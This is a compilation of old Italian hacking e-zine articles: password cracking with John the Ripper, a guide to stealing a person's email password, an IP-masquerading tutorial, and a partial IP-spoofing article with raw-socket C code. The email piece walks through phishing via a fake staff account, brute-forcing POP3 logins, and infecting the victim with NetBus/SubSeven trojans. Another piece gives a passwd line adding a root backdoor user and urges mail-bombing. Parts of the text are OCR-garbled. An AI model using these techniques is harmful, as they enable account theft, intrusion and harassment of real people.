Puo' essere lanciato in due modalita' wordlist o incremental: 

Wordlist significa che il programma legge da un file testo l'elenco di parole 


che utilizzera' per trovare la password.. esistono diversi file contenenti 
tutte le parole inglesi o italiane, a questi poi vanno aggiunti quelli che 
contengono le password piu' comuni, i nomi propri di persona, nomi di 
macchine.. tutto quello che insomma voi utilizzereste come chiave di accesso. 
Il procedimento e' molto veloce.. in 30 secondi john vi dice se e' stata 
usata una parola italiana, leggendo dal file con tutto il dizionario dentro, 
(per informazioni: il file in questione contiene quasi 2 milioni di parole e 
tiene circa 600 Kb) e in un'altra manciata di secondi vi controlla le liste 
di parole piu' comuni e vari file aggiunti... 

Nonostante non sia mai consigliato scegliere una parola semplice e scritta 
senza caratteri speciali, un procedimento di questo tipo da 

spesso piu' risultati di quello che ci si potrebbe aspettare... 


Se una password non viene decriptata con le liste di parole comuni 

allora rimane solo un modo: provare tutte le combinazioni di caratteri 
disponibili, ovvero il modo incremental... 

Penserete che per un computer potente come un Pentium II 266 

associato a un programma ottimizzato riesca ad affrontare brillantemente una 
simile impresa.. ma... facciamo qualche conto: 


Ci sono 95 caratteri che si possono utilizzare in una parola chiave... 
questi comprendono tutte le minuscole, tutte le maiuscole e tutti i caratteri 
come !()?'/A.... ovvero i caratteri ASCII da 33 a 128. 

Una password al massimo e' costituita da 8 caratteri e dunque se vogliamo 
contare tutte le possibilita' queste sono 95/18 ovvero 6.63*10/115... 

un programma come john su un Pentium II 266 puo' controllare circa 20000 
parole al secondo.. non sono certamente poche ma per controllarle tutte 
occorrono ben 10000 anni...tantini...La statistica pero' ci da una mano e 
infatti john e' calibrato su un datadase di 10000 password da cui ha 
estrapolato i caratteri piu' comuni, in questo modo vengono provate 

prima le combinazioni piu' probabili e vengono lasciate per ultime 

quelle piu' complicate... in questo modo si riduce enormente il tempo 

per identificare una parola chiave, senza contare poi che molti, in barba 
alla sicurezza del sistema, scelgono parole strane ma cortissime, di 4-5 
caratteri che vengono scoperte nel giro di un giorno... 


A volte puo' anche meravigliare quanto un sistema possa essere insicuro, 
con OP che scelgono una password incasinatissima per l'accesso root e 

poi trovi degli utenti con chiavi tipo "pippo" "ciao" che hanno quasi 
privilegi da amministratore... 

Se pero' si sceglie una password complicata allora direi che diventa 
praticamente impossibile decifrarla, in casi simili non bisogna disperare 
...le vie del signore sono infinite... 

si puo' infatti cercare di infiltrarsi in account scoperti ed editare il 
file passwd inserendo una riga come 


mckrak::0:0:Super User:/:/bin/sh 


...ficonnettersi come mckrak e dare inizio alle danze... 
sembra facile...ma molto spesso non e' un impresa da poco... 


Per ulteriori informazioni sui sistemi Unix rimando ad articoli specifici 
dove verra' spiegato cos'e' l'UserID, il groupiD, la shell, ecc... 


Se uno di questi giorni trovo un po' di tempo (ma soprattutto la voglia), 
mi piacerebbe variare il codice sorgente di John in modo da sfruttare le 
istruzioni MMX dei nuovi processori... il codice MMX e' infatti composto 
da 57 istruzioni che utilizzano i registri della FPU per velocizzare i 


calcoli matematici, abbondanti nei programmi multimediali o 

di grafica real-time... implementando queste nella routine di John 

che crypta le parole chiavi col sistema DES, penso che si possa aumentare di 
un buon 80 % la velocita' di esecuzione del programma... ma la cosa potrebbe 
rivelarsi abbastanza incasinata 


Jack McKrak 


P.S. Ultimante si sentono molte notizie di pedofili che usavano internet per 
spacciare immagini e informazioni di ogni tipo...vorrei invitare tutti 

quelli che per caso capitano in gruppi o siti di questo genere a boicottare 

nel modo piu' totale chi favorisce la diffusione di questo materiale... 

se non volete segnalare tutto alle autorita' munitevi almeno di un bel 
programma di Mail Bombing e fata tabula rasa di tutti gli indirizzi collegati... 
Fermiamo chi usa la rete per veicolare principi opposti a quelli per cui 

e' stata creata... 


COME SCOVARE LE PASSWORD DI POSTA ELETTRONICA 

Supponiamo di dover scovare la password di posta elettronica di un utente, e cerchiamo di vedere quali 
siano i possibili metodi per realizzare tale azione. Una prima tecnica, praticamente impossibile da 
applicare, potrebbe essere riuscire ad entrare nel server di posta a cui è registrato l'utente e trarre tutte le 
informazioni che si vogliono. Purtroppo questa è una vera e propria azione di crackaggio ed è da 
escludere a priori. Comunque se ci riuscite contattatemi perché vi do le mie coordinate bancarie, e mi 
fate anche un favore... :) 

Un secondo metodo, molto più realistico e funzionale, è quello di crearsi un account di servizio presso 
lo stesso servizio di posta a cui è registrato l'utente. Supponiamo che la vittima sia 
ciccio@katamail.com, basta crearsi un account tipo staff_tecnico@katamail.com, e mandare a ciccio 
una bella mail, ricca di formalità, in cui gli si richiede di inviarvi il nome utente e la password, per 
morivi tecnici di riordino dei database. Se ciccio non è propriamente un genio, tale tecnica dovrebbe 
funzionare, ma potrebbe destare qualche sospetto ed indurlo a cambiare password magari dopo qualche 
giorno, dunque spicciatevi:) 

Se ciccio si verificasse più furbo del previsto, dovreste passare al piano numero tre. La terza tecnica, 
ovvero l'uso di programmi specifici che provano molte password, sino a che non trovano quella che gli 
permette di entrare. Nel sito, a tale scopo, sono presenti Elzapop, e brute, ma se volete uno strumento 
ancora più veloce potete ricorrere a Brutus che troverete senza alcuna difficoltà nella rete, mentre 
sconsiglio l'uso di Unsicure 1.2, che è valido per il cracking dell'FTP, ma non adatto al nostro scopo. In 
Elzapop, sono presenti due file, user.txt e pass.txt, entrambi vuoti. Voi non dovete far altro che inserire 
in user.txt, la stringa "ciccio" e sovrascrivere pass.txt con un file dallo stesso nome ma che contenga 
una grande sfilza di password possibili, un esempio potrebbe essere: 


pippo 
topolino 
paperino 
clarabella 


A questo punto basterà lanciare il comando dal prompt di dos: elzapop mail.katamail.com ed elzapop 
proverà tutte e quattro le password inserite, sull'utente scritto in user.txt, ovvero su 
ciccio@katamail.com Il problema che si pone ora è di avere un gran numero di password possibili. Nel 


sito ho fornito un dizionario delle parole italiane, comunque in giro per la rete se ne trovano di tutti i 
tipi: inglese, tedesco, spagnolo, cinema, nomi, ecc, ecc... 

Arrivati a questo punto, se dopo il pomeriggio speso a provarle tutte, ottenete la vostra bella password 
che Elzapop vi svelerà con tanto entusiasmo, avete ottenuto il vostro scopo, mandatemi una bella mail e 
fatemelo sapere. Se invece, siamo caduti nello sconforto, niente paura... non siamo ancora del tutto 
affondati, manca la poppa... :) 

Nel sito sono presenti txt2diz, WeirdWord e passlist, i primi due prendono un vostro documento e ne 
creano un file con tutte password rimescolando le parole presenti nel file di input, mentre passlist crea 
tutte le password possibili, dandogli come input, solamente l'inizio della ricerca e il tipo di caratteri 
presenti nella password... occhio ai file di dimensione eccessiva... 

La premessa è che con i primi due, si ottengono bei risultati, sempre ammesso che ciccio abbia una 
password abbastanza usuale... Se ciccio avesse una password piuttosto complicata con lettere 
minuscole, maiuscole e numeri ad esempio, si dovrebbe ricorrere alla creazione di una lista di password 
con passlist ed in tal caso i tempi per provarle tutte sarebbero davvero lunghissimi ed a meno che non si 
possegga un processore Alpha e un collegamento di tipo T3, di sicuro spenderemmo solo un gran 
numero di ore di collegamento a internet :( 

Se avete ottenuto Brutus, la stessa cosa la potete fare direttamente senza utilizzare passlist, perché 
farete direttamente un attacco di tipo BruteForce... 

In questo punto della vostra disperazione, non credo abbiate ottenuto risultati concreti, io non li ho 
ottenuti... però provate pure col brute force... :) 

Se dopo ore e ore di prove, non riuscite ad ottenere nulla, forse è il caso di lasciar perdere questa 
tecnica, perché ciccio ha di certo una password come si deve... :( 

Si passa in questo dantesco avvicinamento all'inferno, alla quarta tecnica, più che semplice, ma 
attuabile solo se avete accesso diretto al pc della vittima. Consiste nel prelevare tutti i file di estensione 
*.pwl e con programmi specifici che si trovano per la rete e che effettuano un attacco brute force (non 
siete connessi, operate su di un file, tempi molto ridotti...), al massimo in 3 giorni otterrete le password 
di tutto il sistema, tra cui di certo anche quella di posta elettronica di ciccio. La faccenda si complica 
ma neanche troppo, se si deve ricorrere alla quinta via, che consiste nell'effettuare lo stesso "lavoro" 
svolto nel quarto metodo, ma questa volta senza avere l'accesso diretto al pc della vittima: bisogna 
lavorare in remoto. Alex vi fornisce nel sito diversi trojan, NetBus, SubSeven e in giro se ne trovano 
anche di altri, scaricatene uno, studiate qualche modo per infettare la vittima col server(un'idea ovvia è 
inviarglielo per posta a nome di un amico :)), e cercate con le tecniche descritte da Alex nella sezione 
Ip, di scoprire il suo ip, o il nome host, potrete controllare così da remoto il suo pc. A questo punto 
basterà attivare il comando che preleva i file .pwl (in NetBus è FILE MANAGER-DOWNLOAD). Ora 
avete i file delle password criptate, sapete già cosa fare, altro giro altra corsa, si parte col BruteForce e 
si ottiene la password... Un sesto metodo, molto più ristrettivo, è attuabile se voi avete un documento 
word protetto della vittima. Con il programma Office password recovery che vi mette a disposizione 
Alex, avrete in breve tempo la password e poiché è molto usuale usare una password un po' per tutto, 
avrete anche ottenuto al 99% la chiave di accesso alla posta elettronica... 

Provatele tutte finché non la trovate, e se dopo innumerevoli tentativi non trovate nulla, comprate un 
processore Alpha :) oppure molto più semplicemente, mettetevi l'anima in pace. Se conoscete altre 
tecniche mandatemi materiale qui: lordnietzsche@hotmail.com (Special thanks to Infected Machine) 
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1 Mascheramento ? 


Informazioni su questo documento 


Questo documento ha solo una ragione di esistere, e cioè quella di insegnare qualcosa a qualcuno. 


Chi dovrebbe leggere questo documento 


Se tu hai dei computer a casa e vuoi condividere la tua connessione internet con il resto della tua 
famiglia, oppure se vuoi vedere le e-mail sullo schermo del computer alla tua sinistra, e nel 
frattempo chattare in irc sullo schermo del tuo computer alla tua destra, tu hai bisogno di usare l'ip 
Masquerading. Si, lo sò che ci sono anche modem che provvedono automaticamente alla 
condivisione dei pacchetti per i prodotti microsoft sul mercato. Ma il vantaggio di farlo via software 
è che puoi montare un 386 in modo che funzioni da mascheratore degli ip,da router, e nello stesso 
tempo da firewall, per cui con un livello di sicurezza e di efficienza molto elevato. 


2 Di cosa hai bisogno? 


Benchè io non abbia ancora spiegato cos'è il Mascheramento (siate pazienti) comincerò col dirvi 
cosa vi serve in ordine per usare il Mascheramento. Vi servono: 


-2 0 + computer 

-una connessione fra questi 2 computer 

-differenti indirizzi ip assegnati a tutti i pc 

“un pc con un modem e una connessione a internet 

-un sistema linux con un kernel 2.2.x o superiore installato su una macchina 
-mezz'ora del tuo tempo (nel peggiore dei casi) 


-qualcosa da mangiare 


Bene, ora che sai cosa ti serve in ordine per usare il Mascheramento, posso cominciare a spiegarti 
cos'è il Mascheramento: 


3 Che cos'è? 


Io sò che il Mascheramento è un processo complicato cosi prima di cominciare con la parte tecnica 
comincerò con un esempio che vi farà capire + 

facilmente il Mascheramento. Una persona A ama una persona B ma la persona A non è nella 
stessa scuola di B, però ha il suo numero di telefono. 

C'è anche un amico comune (C) che conosce A ed è nella stessa scuola di B. Cosi A parla con C, e 
C parla con B senza menzionare chi è A. Dicendo 

che le informazioni sono solo per se stesso. 

Immaginate ora che la persona B sia internet, e la persona A sia un client mascherato, e che C sia il 
server mascheratore. 


Per capire meglio farò una breve introduzione al TCP/IP. TCP/IP stà per Trasmission Control 
Protocol/Internet Protocol. E' largamente usato per 

le comunicazioni fra computer (prima del TCP/IP tutti usavano l'UUCP = Unix to Unix Copy 
Protocol). Il TCP/IP è un protocollo che controlla la 

tua comunicazione, e che usa indirizzi ip. GLi indirizzi ip consistono in 12 numeri raggruppati in 
gruppi da 3, e separati da un punto, 

ad esempio 212.213.221.221 .I numeri vanno da 0 a 255, questo protocollo di identificazione di 
host nella rete tramite indirizzi ip cosi 

strutturati è detto ipv4, ora si stà diffondendo il nuovo protocollo ipv6, che diventerà standard entro 
3 anni, dove gli indirizzi ip sono 

composti da 8 numeri esadecimali (0-9 a b c de f) separati da due punti (:), che per motivi che non 
vi stò ora a spiegare è stato creato, 

cmq prevalentemente per permettere ad internet di avere molti + utenti connessi 
contemporaneamente di adesso. 

Il TCP/IP lavora cosi: 

=>Io sono 1.2.3.4 e voglio contattare 1.2.3.3 

->Io sono 1.2.3.3 mi hai chiamato? 

=>Io sono 1.2.3.4 e ti ho contattato 

->Io sono 1.2.3.3 e pronto 

=>Io sono 1.2.3.4 e voglio quel file 

->Io sono 1.2.3.3 e stò mandando la prima parte a 1.2.3.4 

=>Io sono 1.2.3.4 e l'ho ricevuta 

->Io sono 1.2.3.3 e stò mandando la seconda parte a 1.2.3.4 

=>Io sono 1.2.3.4 e io non ho ricevuto niente 

->Io sono 1.2.3.3 e te la stò mandando di nuovo 

=>Io sono 1.2.3.4 e io l'ho ricevuta 

->Io sono 1.2.3.3 e stò aspettando 

=>Io sono 1.2.3.4 e sono pronto, ciao 

->Io sono 1.2.3.3 ciao 

To sò che questa può sembrare una cosa da bambini, ma una comunicazioni di dati (e anche il 
TCP/IP) lavorano proprio cosi. 


/| 10.0.0.2 | 
E 
/ 

/ 
/ 


10.0.0.1 / 


be A | 
[internet|------ | | | 10.0.0.3 | 


Loi e Mel 


dana 
\ 
PPP \ 
\ 
\ 
ETH \| | 
\| 10.0.0.4 | 
|__| 


Ora dovresti essere in grado di capire l'immagine. Voi vedete un computer con un ip locale 10.0.0.1 
che è connesso a internet tramite 

una linea telefonica, e con un ip dato dal'ISP (Internet Service Provider) che è 11.1.1.4 . Che cosa 
significa? Se qualcuno su internet 

prova a contattare 11.1.1.4 riceverà un responso, ma se invece provasse a contattare 10.0.0.1 non 
riceverebbe alcun responso anche se 

è lo stesso computer, per il semplice fatto che l'ip 10.0.0.1 non c'è su internet (o magari c'è, ma si 
tratta comunque di un'altro pc). 

Allora noi abbiamo 10.0.0.2 finchè 10.0.0.X si connette a 10.0.0.1 . In questo caso noi consideriamo 
10.0.0.1 come gateway (il gateway 

è una sorta di uscita verso un'altro network, un gateway può essere linkato tra 10.0.1.X e 10.0.0.X., 
ma tuttavia prima che la macchina 

riconosca 10.0.1.X e 10.0.0.X servirebbero 2 network card, o in questo caso un modem e una 
network card). Cosi noi lo consideriamo come 

gateway ma c'è 1 dettaglio, per 10.0.0.1 diventa un gateway. Ma non per la semplice ragione che 
internet non lo vuole riconoscere. 

=>Io sono 10.0.0.2 e vorrei contattarti 

->Io sono 1.2.3.3 e ora io ho idea di come raggiungerti, vattene (questo messaggio non è davvero 
mandato in broadcast perchè non ci 

sono route logici tra i 2 computer, pertanto il messaggio viene solamente loggato) 

Ma allora che cosa fà il Mascheramento? Bè, esso dà il proprio ip (11.1.1.4 è l'ip collegato all'ISP, 
dato da DHCP per esempio) l' 

intero network ricorda che computer richiede che pacchetto. Qualcosa tipo: 

=>Io sono 10.0.0.2 e voglio contattare 1.2.3.3 

->Io sono 10.0.0.1 e io processerò la tua richiesta 

->Io sono 14.1.1.4 e voglio contattare 1.2.3.3 

_>Io sono 1.2.3.3 e stò aspettando tuoi comandi 

Io spero che questo vi chiarisca le idee. Cosi un server mascherato da il suo ip nell'ordine per gli 
altri pc presi dalla rete. E i 

pacchetti entranti vengono filtrati wotto il network 10.0.0.X 


4 Preparare il tuo sistema 


To suppongo che voi tutti avete un computer con un sistema Linux installato e che abbiate 
configurato il vostro internet account 

(se non l'avete ancora fatto, guardate le pagine d'aiuto del provider). Presuppongo anche che 
sappiate alcune basi di Linux, come 

per esempio la ricompilazione del kernel. Questo intero sito è solamente valido se avete un kernel 
2.2.X o superiore. Se non 

avete un kernel 2.2.X suggerisco di farvi l'upgrade del kernel (www.kernel.org per i sorgenti del 
kernel da compilare). Questo 

perchè i vecchi kernel contengono bugs, non supportano l'hardware nuovo e rendono il vostro 
sistema molto vulnerabile agli 

attacchi. Ora vi esporrò brevemente le basi del kernel: 

GoMoRRaH@SaTaN GoMoRRaH]$ mv mykernel.tar.gz /usr/src/ 

[GoMoRRaH@SaTaN GoMoRRaH]$ cd /usr/src 

[GoMoRRaH@SaTaN src]$ rm linux (rimuovete il link simbolico dei vostri vecchi sorgenti) 
[GoMoRRaH@SaTaN src]$ tar -zxvf mykernel.tar.gz 

(il tuo kernel verrà estratto) 

[GoMoRRaH@SaTaN src]$ cd linux 

[GoMoRRaH@SaTaN linux]$ make menuconfig 

(potete scegliere, scrivendo: make config per l'installazione testuale, make menuconfig per quella 
grafica, e scrivete: make xconfig sotto X-window) 

Ora potete vedere tutte le opzioni che potete usare, questo è differente per ciascun sistema. Ma 
come sempre voi 

avete da selezionare dei moduli particolari da installare, vediamo quali: 

=> Prompt for development and or incomplete code / drivers 

=>Enable loadable module support 

=>Networking support 

=>Network firewalls 

=>TCP/IP Networking 

=>IP:forwarding/gatewaying 

=>IP:firewalling 

=>IP:masquerading 

=>IP:ipportfw masq support 

=>IP:ipautofw masq support 

=>IP:ICMP masquerading 

=>IP:always defragment 

=>Dummy net driver support 

=>IP:ip fwmark masg-forwarding support 

Notate che queste opzioni servono per il Mascheramento IP. Quando avrai finito dovrei salvare le 
modifiche. 

I seguenti comandi per la compilazione richiedono da 10 a 40 minuti, e ti mostreranno molti 
caratteri 

incomprensibili sullo schermo, non ti preoccupare, è normale. 

GoMoRRaH@SaTaN linux]$ make dep 

[GoMoRRaH@SaTaN linux]$ make clean 

[GoMoRRaH@SaTaN linux]$ make bzImage 

[GoMoRRaH@SaTaN linux]$ cp /usr/src/linux/arch/i386/boot/bzImage /boot/kernel 
[GoMoRRaH@SaTaN linux]$ make modules 


[GoMoRRaH@SaTaN linux]$ make modules_install 

A questo punto devi editare il /etc/lilo.conf file. Devi metterci qualcosa che ti piace 
image=/boot/kernel 

label=masgkernel 

root=/dev/hdax (rimpiazza questo con il tuo root filesystem, harddisk, partizione, etc.) 
read-only 

Questo permetterà al tuo boot manager di riconoscere il tuo nuovo kernel all'avvio del pc. La 
prossima volta 

che vedrai il promt di lilo (o grub) dovrai fare il masgkemel. 

[GoMoRRaH@SaTaN linux]$ lilo 

added linux-2.2.5-15 * 

added dos 

added masgkernel 

Ora dovresti editare il /etc/rc.d/rc.local file cosi i moduli necessari saranno caricati automaticamente 
al boot del sistema 


/sbin/depmode -a 
/sbin/modprobe ip_masq_ftp 
/sbin/modprobe ip_masg_raudio 
/sbin/modprobe ip_masq_irc 


Questi moduli sono necessari per ftp, real audio e irc. Questa è l'unica cosa da fare inoltre è 
riavviare è quella di abilitare l'IPV4 forwarding. 

[GoMoRRaH@SaTaN linux] echo "1" > /proc/sys/net/ip_forward(ing) Ora devi riavviare il tuo 
sistema con il tuo nuovo kernel, 

guarda se tutto nel boot è andato correttamente, se qualcosa è andato sbagliato rifai tutto daccapo, e 
non ti preoccupare, 

la ricompilazione del kernel è per tutti difficile la prima volta. 


5 Avviare il Mascheramento 


Infatti non è molto difficile quando tu hai il tuo kernel. Ora, per dialogare col tuo provider devi 
settare la tua 

forwarding policies (polizza di instradamento) in questo modo: 

[GoMoRRaH@SaTaN GoMoRRaH]$ ipchains -P forward DENY 

[GoMoRRaH@SaTaN GoMoRRaH]$ ipchains -A forward -s 10.0.0.0/4 -j MASQ 

Nell'ordine per questo lavoro sul tuo network locale l'unica cosa che hai da aggiustare è il parametro 
-s parametro. 

10.0.0.0 è il tuo indirizzo di network e il 4 è il più alto indirizzo ip che viene mascherato. Il tuo 
server ora dovrebbe andare. 

Eh si, è davvero cosi, tu hai molta teoria e molta preparazione con il tuo kernel, e ti sono bastate 2 
linee di comando per far andare il tuo server. 


6 Configurare i tuoi client 


Tu hai un server, ma cos'è un server senza client? Cos'è un supermercato senza i prodotti? C'è solo 
una piccola 


cosa che dovresti fare se non l'hai già fatta: configurare i client in modo che sfruttino come 
gateway 


l'ip del server (nel nostro caso 10.0.0.1). Le opzioni per il configuramento sono facili da trovare, 
per cui non dovreste avere problemi con i client. 


Testo originale di GoOMoRRaH, membro della Black Sun Research Facility (http://blacksun.box.sk) 
Testo tradotto da Net-Destroyer 


Net-Destroyer & The Last Clan of True Hackers Crew 

e-mail: net_destroyer@hotmail.com 

http://digilander.iol.it/truehackers 

http://www.demonseyecrew.cjb.net 

IRC: server irc.oltrelinux.com canale #checkmate col nick Net-Destroyer 


Dedicated to: TheFireAngel (ma c'è l'hai su con quei menù in java? =), TheSysFucker(non disperare 
se vai male a scuola, 

è il destino, che ci vuoi fare =), Heretic1000 (hai una voce satanica amico mio :),LordSpirit(non ti 
vedo mai in 

irc cavolina),Bluangel (Bluuuuvuuuunuu, ma dove 6 finita???), DoS (quando è che lo montiamo 
l'irc server? :), 

TinoSpider (fra un pò mi tocca metterti cfounder nel canale :),oVERDRIVE (e meno male che non 
monti bot sulle 

shell ke hakki, hai una botnet ke fà paura), SPYRO (sai ke non ti ho mai visto sputare fuoco =), a 
BlackMan 

(mai visto un webmaster migliore di te), ad alexandro (come vanno gli esami all'università? :), 

alla Veninside Crew (www.veninside.cjb.net), alla demonseyecrew, a josh (mi devi spiegare come 
si accende un pc, me l'hai promesso =), a darkangel999 (e tu saresti quello ke hakka la nasa tre volte 
al giorno? 

Ma fammi il piacere :), a tutti quelli di #ahccc (ma perkè mi mettete sempre nel vostro topic? :), 

a quelli di #debian, in particolare Fata e debiAn,a devajl (il miglior programmatore d'Italia), a 
CrOsTINO 

(hehehe, com'è il libro che ti 6 comprato? Ricordati di passarmelo quando lo hai finito :), 

e a tutti quelli ke mi fanno i riti wodoo per proteggermi =) 


Fuck to: 

NERVvOus (sarai anche l'admin di oltrelinux.com, ma resti pur sempre una merda se paragonato a 
me =), a BOFH (e tu saresti un Bastar Operator From Hell? Per me sei una testa di fungo e basta =), 
a dibellas (che cazzo mi kikki ogni volta solo perkè entro nel chan e non parlo???), e ad Afree che 
prima o poi li distruggo la sua botnet. 


kill -9 Net-Destroyer 
Nessuno riuscirà mai a killarmi =) 
Byez 


-=!!!|-TiPi Di AtTaCcHi Al TcP-iP-|!!!=- 


Autore: davser 
Info: davser@tin.it - http://davser.cjb.net - ICQ 19930061 


Questo articolo e' una raccolta di testi sull'attacco al TCP/IP oltre a qualcosa di 
mio. Ho attinto da varie riviste, libri, ecc. quindi non mailatemi dicendo che 
avete gia' letto queste cose da altre parti! 


OK, cominciamo... 


Il protocollo TCP/IP, dalla sua comparsa ad oggi, e' stato analizzato dal punto di 
vista della sicurezza, delle performance, dell'ottimizzazione e degli stati 
indefiniti in maniera molto profonda. Nel corso del tempo varie vulnerabilita' sono 
state scoperte, sia nel protocollo in se', che nelle varie implementazioni 
disponibili (ossia gli stack TCP/IP dei sistemi operativi). Tuttavia, una 
implementazione ben pensata del TCP/IP, e' ancora in grado di fornire buoni livelli 
di sicurezza nel caso in cui siano state prese tutte le precauzioni necessarie. 


****L'IP spoofing attack***** 


Per chi si avvicina al mondo della sicurezza, l'attacco conosciuto come "IP 
spoofing" e' spesso fonte di confusione. L'equivoco sta nel fatto che col termine 
"IP spoofing" si indicano due attacchi distinti: il primo consiste nello spedire 
dei pacchetti IP aventi l'indirizzo sorgente contraffatto, l'altro nell'utilizzo 
del primo attacco per costruirne uno piu' complesso, conosciuto come "blind 
spoofing", ovvero spoofing alla cieca. Qui vedremo in dettaglio il primo dei due 
attacchi. 

L'IP spoofing e' una tecnica che consiste nell'inviare dei pacchetti 
opportunamente 'modificati' per far credere al destinatario, che gli stessi 
arrivino da tutt'altra parte e, quindi, per rendersi 'anonimi' (o meglio spacciarsi 
per qualcun altro) agli occhi della "vittima". Questo si ottiene modificando 
l'indirizzo IP sorgente(source IP) nell' header (intestazione) del pacchetto 
(datagramma IP). L'IP spoofing viene utilizzato per molti attacchi sia di tipo 
D.0.S. (Denial of Service, attacchi che possono mettere fuori uso, bloccare o 
rallentare il sistema momentaneamente... fastidioso ma non provoca danni gravi), 
sia per il tipico Hacking (attacchi molto piu' interessanti che possono permettere 
di guadagnare particolari accessi nei sistemi) e utilizzato sia in modo diretto 
(attaccando cioe' direttamente il sistema che riceve i pacchetti spoofati), sia in 
modo indiretto (sfruttando cioe' le risposte che la macchina destinataria dello 
spoof invia al presunto mittente). Gli attacchi D.0.S. che si possono realizzare 
cmq sono molti: dai vari flood (syn flood, rst flood) al click, al boink ecc. 
Oppure, se proprio si vuole avere la comunicazione bilaterale, si potrebbe tentare 
di instaurarla alla ceca, cercando di prevedere le varie risposte della vittima ai 
nostri pacchetti, e rispondendo a nostra volta in modo adeguato (assicurandoci 
pero' che l'IP da noi spoofato sia in quel momento irraggiungibile e non possa 
quindi rispondere anche lui alla vittima (che, sta inviando pacchetti all'indirizzo 
da noi spoofato). 

Uno schemino chiaro che riassume l'IP spoofing (e si trova su praticamente tutti i 
documenti che trattano IP spoofing), e' all'incirca questo: 


in cui: noi siamo host S, il bersaglio del nostro attacco e' host Be ile 
l'indirizzo sorgente che metteremo nell'header dei pacchetti al posto del nostro, 
corrisponde al'indirizzo di host A. Come si puo' realizzare lo spoofing? Be' per 
farvi un idea, un programma che lo realizza e che probabilmente avrete utilizzato 
qualche volta e' il famoso Click della 7th sphere... che fa esattamente questo: 


Ipotizziamo un tipico attacco D.0.S. da lamer in IRC. Secondo lo schemino che c'e' 
li sopra: se noi siamo host S e vogliamo disconnettere host B dal server IRC host A 
(un server a caso irc.tin.it hihihi) che facciamo? Impostiamo il Click con i giusti 
dati e scegliamo tra il modo client side oppure server side, quindi lanciamo 
l'attacco. Mettiamo di aver scelto l'attacco client side.... 

Succede che il Click comincia a mandare a host B pacchetti ICMP spoofati aventi 
come indirizzo sorgente host A (server IRC) e come contenuto una frase del tipo 


"Sono Esploso!!". ("host unreachable") Host B (vittima) a questo punto riceve 
questa 'lettera/pacchetto' proveniente da Host A (server IRC), legge il messaggio e 
realizza che host A (server IRC) e' esploso .. quindi pensa: "che cavolo ci 


rimango connesso a fare a un indirizzo di server che non c'e' piu' perche' e' 
esploso?" a questo punto si disconnette. L'attacco e' realizzato, host B e' 
disconnesso da IRC. Nel caso avessimo scelto il modo di attacco server side, il 
procedimento e' uguale ma i pacchetti vengono mandati a host A (server IRC) e 
provenienti da host B (vittima), quindi e' il server IRC che scollega host B 
credendolo 'esploso'. Questo e' solo un esempio di attacco. In effetti, sfruttare 
appieno l'IP spoofing (anche per cercare di far qualcosa 

in piu' dei tipici D.0.S.), significa soprattutto potersi costruire i pacchetti da 
inviare, su misura.. a seconda del tipo di attacco che vogliamo realizzare. Questo 
risulta piu' facile da ottenere ad esempio su sistemi Linux che su Winzozz 9x, 
pero' per questi ultimi potreste utilizzare programmi appositi (ad esempio exploit 
generator) che funzionano abbastanza bene. 


Come si fa a mandare un pacchetto spoofato? 


Beh, ci sono modi e modi. Da Unix & Company e' molto facile: basta creare un socket 
RAW (un socket *molto* grezzo) e lavorarlo mettendoci sopra degli header IP e TCP 
(ma anche UDP o ICMP) non standard, cioe' come quelli che si trovano nelle librerie 
net*. Infatti, nel nostro header IP dovremmo mettere anche l'ip del mittente, cosa 
che invece con le normali funzioni di sending viene automaticamente fatta dal 
protocollo usato. 

In principio si crea un bell'header ip tipo: 


struct ipheader { 
unsigned char verlen, tos; //versione+lunghezza header, tipo 
unsigned short lenght, identification, flageoffset; //lunghezza, id, flags+toffset 


unsigned char ttl, protocol; //time to live, protocollo utilizzato 
unsigned long int source, destination; //indirizzo ip sorgente, destinazione 
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ecco, bello vero? 
Se esaminate attentamente vedrete: 


* un char (8 bit) che include sia la versione ip che la lunghezza 
dello header (contenitori a 4 bit non li so trovare io in c...) 


* un char (8 bit) per il tipo di servizio (TOS) 


* uno short (16 bit) per la lunghezza, uno per l'identificazione e uno che 
include i 3 bit dei flag e i 13 del fragment offset 


* un altro char per il time to live, ovvero su quanti server pu» passare 
prima di fermarsi 


* un altro char che identifica il protocollo 
* due long (32 bit) che identificano l'ip sorgente e quello di destinazione 
Per agevolarci ora creeremo uno pseudo ip header: 


struct pseudoipheader { 


unsigned long int source, destination; 
char byte_zero, protocol; 
unsigned short TCP_UDP_lenght; 

3; 


qui abbiamo l'ip sorgente, destinazione, il byte zero, il protocollo 
utilizzato e la lunghezza del tcp o dell'udp. 
Ora veniamo ai protocolli TCP e UDP: 


struct tcpheader { 
unsigned short source, destination; 
unsigned long int seg, ack; 
unsigned short offset_flags, window, checksum, urgent; 


ti 


da notare che i source e i destination sono non degli indirizzi, ma delle porte 
(short a 16 bit), qui dovete mettere la porta sorgente e quella destinazione, 
insomma. Poi c'e' il SEQ e l'ACK, interi a 32 bit, e infine abbiamo l'header lenght 
+ reserved + flags, window, il checksum e l'urgent pointer. Ecco qui anche quello 
dell'udp, giusto per facilitarvi la vita :) 


struct udpheader { 
unsigned short source, destination, lenght, checksum; 


Tutto chiaro no? E per finire si crea uno struct di scambio di dati spoofati, anche 
questo per facilitarci la vita... 


struct spdataexchange { 
int fd; 
char *data; 
int datalen; 
char *source; 
unsigned short sourceport; 
char *destination; 
unsigned short destinationport; 
unsigned long seq, ack; 
unsigned short flags; 
char *buffer; 
int ip _optlen, tcp_optlen; 


} 
In questo struct copieremo i dati ip e tcp e tutto il resto, per poi scriverlo sul 
pacchetto da inviare... Ora, come facciamo ad inviare un pacchetto??? Creeremo una 


funzione detta sendsppacket: 


void sendsppacket(struc spdataexchange *sp, unsigned char protcollo) 
{ 

int sp_status; 

struct sockaddr_in *sp_serv; 

struct hostent *sp_help; 

int HEADER_BASE; 

bzero((char *)&sp_serv, sizeof(struct sockaddr)); 

sp_serv.sin_ family = AF_INET; 

sp_serv.sin_addr.s_addr = inet_addr(sp->destination); 

if(sp_serv.sin_addr.s_addr==(unsigned int)-1) 


if(!(sp_help=gethostbyname(sp->destination))) 
fprintf(stderr, "unknown host %s\n",sp->destination), exit(1); 
bcopy(sp_help->h_addr, (caddr_t)&sp_serv.sin_addr,sp_help->h_lenght); 


switch(protocollo) 


case TCP: HEADER_BASE = TCP_HEADER_BASE; break; //Spiego sotto questi passaggi 
case UDP: HEADER_BASE = UDP_HEADER_BASE; break; 
case default: exit(1); break; 


sp_status = sendto(sp->fd, (char *)sp->buffer, sp->datalen+HEADER_BASE+ 
IP_HEADER_BASE+sp->ip_optlen, 0, (struct sockaddr *)&sp_serv, 
